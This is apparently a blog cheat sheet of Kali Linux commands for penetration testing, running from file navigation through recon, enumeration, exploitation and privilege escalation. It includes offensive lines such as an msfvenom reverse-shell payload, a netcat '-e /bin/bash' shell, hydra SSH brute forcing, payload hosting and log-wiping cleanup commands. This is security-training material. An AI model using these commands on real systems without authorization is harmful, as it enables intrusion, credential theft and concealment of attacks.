Let me say this honestly — Kali Linux doesn’t make you a hacker. Commands do.

Over the last 20+ years working in penetration testing labs, enterprise red-team engagements, incident response war rooms, and security training classrooms, I’ve noticed one consistent pattern:

👉 Beginners install Kali.
👉 Open Terminal.
👉 Then freeze.

Because nobody really teaches what commands actually matter in real assessments.

This Kali Linux Commands List – 200+ Commands Cheat Sheet is exactly what I teach junior analysts during their first month of hands-on security training. Not theory. Not documentation language. Just practical usage — the commands you’ll actually type during reconnaissance, exploitation, privilege escalation, and defense.

Now let’s break this down properly.


Understanding Kali Linux Commands (Simple Explanation)

Think of Kali Linux terminal as your control center.

Every penetration test — whether web, network, cloud, or internal infrastructure — follows roughly this flow:

  1. System navigation
  2. Network discovery
  3. Information gathering
  4. Enumeration
  5. Exploitation
  6. Privilege escalation
  7. Post exploitation
  8. Cleanup & reporting

And guess what connects all these stages?

✅ Commands.

In real assessments, GUI tools slow you down. Terminal commands give speed, automation, stealth, and precision.


🖥️ Basic Linux Navigation Commands (Foundation Layer)

Most beginners skip this part — huge mistake.

Essential File & Directory Commands

pwd
ls
ls -la
cd
cd ..
mkdir
rmdir
touch
cp
mv
rm
rm -rf
tree
clear
history

Their usage is mentioned below:

pwd

Use: Shows current directory.

Real Use Case:
During exploitation, you must know where payloads are stored.


ls

Use: Lists files in directory.

ls

Shows visible files.


ls -la

Use: Show all files including hidden ones.

Hidden files start with .

ls -la

⚡ Attackers often hide persistence files here.


cd

Use: Change directory.

cd /var/www

Moves into web server folder.


cd ..

Use: Move one level up.


mkdir

Use: Create directory.

mkdir scans

Professionals separate scan results properly.


touch

Use: Create empty file.

touch notes.txt

Useful for documentation during testing.


cp

Use: Copy files.

cp exploit.sh /tmp

mv

Use: Move or rename files.

mv shell.php backup.php

rm

Use: Delete file.

rm file.txt

rm -rf

Use: Force delete directory.

⚠ Dangerous command.

rm -rf folder/

history

Use: Shows previously executed commands.

Real-world use:
During internal penetration tests, you constantly move between payload folders, scan outputs, and exploit scripts.

File Viewing Commands

cat
less
more
head
tail
tail -f
nano
vi
file
stat

tail -f becomes critical while monitoring logs during exploitation.


⚠️ Beginner Mistake Alert
Many learners depend only on GUI editors. During SSH access to compromised servers, GUI doesn’t exist.

Terminal editing saves engagements.


👤 User & Permission Management Commands

Privilege escalation lives here.

whoami
id
groups
sudo
su
passwd
adduser
deluser
chmod
chmod 777
chmod +x
chown

In detail for above useful ones:

whoami

Shows current logged-in user.

whoami

First command after gaining shell access.


id

Displays:

  • UID
  • GID
  • Groups

Helps identify privilege level.


sudo

Run command as administrator.

sudo apt update

su

Switch user.

su root

chmod

Change permissions.

chmod +x exploit.sh

Makes script executable.

Permission Meaning:

  • r = read
  • w = write
  • x = execute

chown

Change ownership.

chown kali:kali file.txt

Why this matters?

In real assessments, compromised users rarely have admin rights.

You must understand permissions deeply.

Example:

chmod +x exploit.sh

Without execution permission → exploit fails.

Simple. Painfully common mistake.


🌐 Network Configuration Commands

Now things get interesting.

ifconfig
ip a
ip route
route
netstat
ss
arp
hostname
ping
traceroute
mtr

ifconfig

Displays network interfaces.

ifconfig

Shows IP address.


ip a

Modern replacement for ifconfig.


ping

Checks connectivity.

ping target.com

netstat

Shows active connections.

netstat -tulnp

Find listening ports.


ss

Faster alternative to netstat.


arp

Displays ARP table.

Useful for local network discovery.


traceroute

Shows path packets travel.

Helps map infrastructure.


Field Insight

During a banking infrastructure assessment, a forgotten internal subnet was discovered purely using routing inspection.

Sometimes the vulnerability isn’t software — it’s visibility.


🔍 Information Gathering Commands (Recon Phase)

This is where ethical hacking actually begins.

nmap
netdiscover
dnsenum
whois
dig
nslookup
theharvester
recon-ng
amass
whatweb

nmap

Network scanner.

nmap -sV target

Detects services & versions.


nmap -p-

Scan all ports.


nmap -A

Aggressive scan:

  • OS detection
  • Scripts
  • Versions

whois

Domain ownership info.

whois domain.com

dig

DNS lookup.

dig google.com

nslookup

Alternative DNS query tool.


theharvester

Email & subdomain gathering.

theharvester -d domain.com -b google

amass

Advanced subdomain enumeration.


Example Workflow

nmap -sC -sV target.com

Reveals:

  • Open ports
  • Services
  • Versions

And versions mean vulnerabilities.


📌 Pro Tip from Field Experience
Never run aggressive scans first in real environments.
Start silent → escalate gradually.

Noise equals detection.


📡 Nmap Advanced Command Cheat Sheet

You’ll use these constantly.

nmap -sn
nmap -p-
nmap -A
nmap -O
nmap -T4
nmap --script vuln
nmap -sS
nmap -sU
nmap -Pn
nmap --open

Real Scenario:
Firewall blocking ping?

nmap -Pn target

Problem solved.


🕵️ Enumeration Commands

Now here’s where most beginners get confused…

Scanning ≠ Enumeration.

Enumeration extracts usable intelligence.

enum4linux
smbclient
rpcclient
showmount
nbtscan
ldapsearch
snmpwalk
nikto
dirb
gobuster
wfuzz
feroxbuster

enum4linux

Enumerates Windows SMB shares.

enum4linux target

Finds users & shares.


smbclient

Access SMB shares.

smbclient -L //target

nikto

Web vulnerability scanner.

nikto -h target.com

gobuster

Directory brute force.

gobuster dir -u target -w wordlist.txt

Find hidden paths.


wfuzz

Web fuzzing tool.


Web Enumeration Example

gobuster dir -u http://target -w wordlist.txt

Finds hidden admin panels surprisingly often.


⚠️ Beginner Mistake Alert
People rush exploitation without enumeration.

90% of successful hacks come from enumeration patience.


💣 Exploitation Commands

Now we enter offensive territory.

msfconsole
searchsploit
msfvenom
exploitdb
sqlmap
hydra
john
hashcat
crackmapexec
impacket tools

msfconsole

Launch Metasploit framework.

msfconsole

Central exploitation platform.


searchsploit

Offline exploit database.

searchsploit apache

msfvenom

Payload generator.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf > shell.elf

sqlmap

SQL Injection automation.

sqlmap -u URL --dbs

hydra

Password brute force.

hydra -l admin -P pass.txt ssh://target

john

Password cracking.

john hash.txt

hashcat

GPU-based cracking.


Metasploit Basics

msfconsole
search exploit
use exploit/module
set RHOSTS
set LHOST
run

Simple workflow — extremely powerful.


Password Attacks

hydra -l admin -P passwords.txt ssh://target
john hashes.txt
hashcat -m 0 hash.txt wordlist.txt

In real environments?

Weak passwords still dominate breaches.

Yes… even in 2026.


🔐 Wireless Attacking Commands

(Only for authorized labs & testing)

airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
wash
reaver
wifite

airmon-ng

Enable monitor mode.

airmon-ng start wlan0

airodump-ng

Capture wireless packets.


aireplay-ng

Packet injection.


aircrack-ng

Crack WiFi password.


⚙️ System Monitoring & Process Commands

top
htop
ps aux
kill
kill -9
jobs
bg
fg
uptime
free -m
df -h
du -sh

During post-exploitation, monitoring system load prevents crashes that expose you.


🧱 Privilege Escalation Commands

Critical phase.

sudo -l
find / -perm -4000 2>/dev/null
linpeas.sh
uname -a
env
getcap -r /

Real Assessment Story

A production Linux server once exposed root access because of a misconfigured SUID binary.

Single command:

find / -perm -4000

Escalation completed in minutes.


📌 Pro Tip from Field Experience
Privilege escalation succeeds more through misconfiguration than exploits.

Admins make mistakes. Attackers notice.


📂 File Transfer Commands

You’ll constantly move payloads.

scp
wget
curl
ftp
python3 -m http.server
nc
rsync

Example quick server:

python3 -m http.server 8080

Fastest payload hosting trick ever.


🔗 Netcat (Hacker’s Swiss Army Knife)

nc -lvnp 4444
nc target 4444
nc -e /bin/bash

Reverse shells. Bind shells. File transfer.

Netcat never gets old.


🧠 Log & Forensics Commands

Blue teams rely heavily here.

last
lastlog
dmesg
journalctl
grep
awk
sed
strings

Incident responders practically live inside logs.


🧹 Cleanup Commands (Often Ignored)

Professional hackers clean traces.

history -c
unset HISTFILE
rm logs

Ethical rule: cleanup after authorized testing.


✅ Kali Linux Commands Master Checklist

Recon

  • Network discovery
  • Port scanning
  • Service detection

Enumeration

  • SMB
  • Web directories
  • Users & shares

Exploitation

  • Vulnerability match
  • Payload creation
  • Access gain

Post Exploitation

  • Privilege escalation
  • Persistence
  • Data validation

⚠️ Common Mistakes I See in Students

  1. Memorizing commands without understanding.
  2. Running loud scans immediately.
  3. Ignoring Linux basics.
  4. Copy-pasting exploits blindly.
  5. Not documenting commands used.

Real pentesters document everything.

Always.


🛡️ Defensive & Ethical Considerations

Let’s be clear.

These commands are tools — not permission.

Always ensure:

  • Written authorization
  • Defined scope
  • Legal engagement
  • Responsible disclosure

Professional reputation matters more than technical skill.


🚀 Quick Actionable Takeaways

✅ Master terminal navigation first
✅ Learn Nmap deeply
✅ Enumeration beats exploitation
✅ Understand permissions
✅ Automate repetitive commands

Consistency builds skill — not tools.


Quick Recap

The Kali Linux Commands List – 200+ Commands Cheat Sheet isn’t about memorization.

It’s about workflow thinking.

When you understand why a command is used, you stop being a tool user and start thinking like an attacker — or defender.

That’s the real transition.


FAQs

❓Do I need to memorize all Kali commands?

No. Learn categories first. Muscle memory develops naturally.


❓Which command should beginners master first?

nmap — without question.


❓Is Metasploit enough for penetration testing?

Not even close. Manual enumeration wins engagements.


❓How long to become comfortable with Kali?

Daily practice for 3–6 months changes everything.


❓Do professionals still use terminal heavily?

Almost exclusively.

GUI tools are secondary.

LEAVE A REPLY

Please enter your comment!
Please enter your name here